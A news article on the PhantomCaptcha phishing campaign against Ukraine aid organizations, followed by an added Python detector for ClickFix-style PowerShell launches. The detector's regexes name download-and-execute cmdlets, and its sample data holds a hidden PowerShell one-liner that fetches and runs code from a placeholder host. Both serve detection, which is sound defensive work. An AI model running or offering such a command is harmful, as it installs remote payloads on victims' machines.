A coordinated phishing campaign aimed at humanitarian and government organizations supporting Ukraine’s war relief efforts has been uncovered by cybersecurity researchers.
The operation, known as “PhantomCaptcha,” impersonated the Ukrainian President’s Office to trick victims into downloading malware through a malicious PDF document.
According to a new advisory by SentinelLABS and the Digital Security Lab of Ukraine published today, the attack began on October 8, 2025, when targeted employees from the International Red Cross, UNICEF, the Norwegian Refugee Council and several Ukrainian regional administrations received phishing emails.
These messages contained an eight-page PDF masquerading as an official government memo. Once opened, the document directed users to a fake Zoom site, zoomconference[.]app, which hosted malicious scripts on infrastructure owned by a Russian provider.
Victims were presented with what appeared to be a Cloudflare verification page. The page prompted them to perform several actions that ultimately executed a PowerShell command, allowing attackers to install malware onto their systems.
This technique, known as “ClickFix” or “Paste and Run,” relies on users unknowingly running commands themselves, bypassing standard security checks.
The malware operated in three separate stages:
- Stage 1: A heavily obfuscated downloader script exceeding 500KB that retrieved additional payloads
- Stage 2: A reconnaissance module gathering system identifiers, usernames and domain information
- Stage 3: A WebSocket-based remote access Trojan (RAT) enabling command execution and data exfiltration
Researchers noted the infrastructure was active for just one day, reflecting a deliberate strategy to evade detection. However, backend servers remained online to manage infected devices.
Further analysis linked PhantomCaptcha to a wider operation involving malicious Android apps disguised as adult entertainment or cloud storage services.
One such domain, princess-mens[.]click, distributed an app called princess.apk, which collected contacts, media, SIM data and location details from infected devices. Although connected, this mobile vector is being tracked as a separate activity cluster.
“The PhantomCaptcha campaign reflects a highly capable adversary, demonstrating extensive operational planning, compartmentalized infrastructure, and deliberate exposure control,” SentinelLABS said.
“The six-month period between initial infrastructure registration and attack execution, followed by the swift takedown of user-facing domains while maintaining backend command-and-control, underscores an operator well-versed in both offensive tradecraft and defensive detection evasion.”
To defend against this threat, the company advised users to remain cautious of instructions requiring them to paste commands into Windows Run dialogs.
Organizations should also monitor PowerShell activity, enforce execution policy restrictions and track suspicious WebSocket connections, particularly those associated with newly registered or impersonated domains.
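The PowerShell monitoring advice above, as an added example that is not part of the advisory: a small Python scorer over constructed Sysmon-style process-creation records that flags the Run-dialog-to-PowerShell pattern ClickFix relies on. The field names, indicator patterns, alert threshold and sample command lines are assumptions made for this illustration, not campaign telemetry.

```python
"""Toy ClickFix / Paste-and-Run detector over constructed process-creation events.

Assumption: each event is a dict with Sysmon Event ID 1 style fields
(Image, ParentImage, CommandLine). Nothing here comes from the advisory.
"""
import re

# Switches and cmdlets typical of pasted PowerShell one-liners (assumed indicator set).
SUSPICIOUS = [
    r"-(?:w|win|windowstyle)\s+hidden",
    r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}",
    r"-(?:ep|executionpolicy)\s+bypass",
    r"\b(?:iex|invoke-expression)\b",
    r"\b(?:irm|invoke-restmethod|invoke-webrequest|downloadstring)\b",
]
PASTE_PARENTS = {"explorer.exe"}  # Win+R Run dialog launches children from explorer.exe
PS_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def score_event(event):
    """Return (score, reasons): one point per indicator hit on this event."""
    reasons = []
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    if image not in PS_HOSTS:
        return 0, reasons
    if parent in PASTE_PARENTS:
        reasons.append(f"{image} spawned directly by {parent} (Run dialog pattern)")
    for pat in SUSPICIOUS:
        if re.search(pat, cmd, re.IGNORECASE):
            reasons.append(f"command line matches /{pat}/")
    return len(reasons), reasons

def alerts(events, threshold=2):
    """Return [(event, reasons)] for events hitting at least `threshold` indicators."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event, reasons))
    return hits

# Constructed sample events (not real telemetry); the URL is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/verify)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for event, reasons in alerts(SAMPLE_EVENTS):
        print("ALERT:", event["CommandLine"], *["\n  - " + r for r in reasons])
```

A scheduled-task or management-agent launch of a signed script, like the second sample, scores zero, while the pasted one-liner trips both the parent-process check and several command-line indicators.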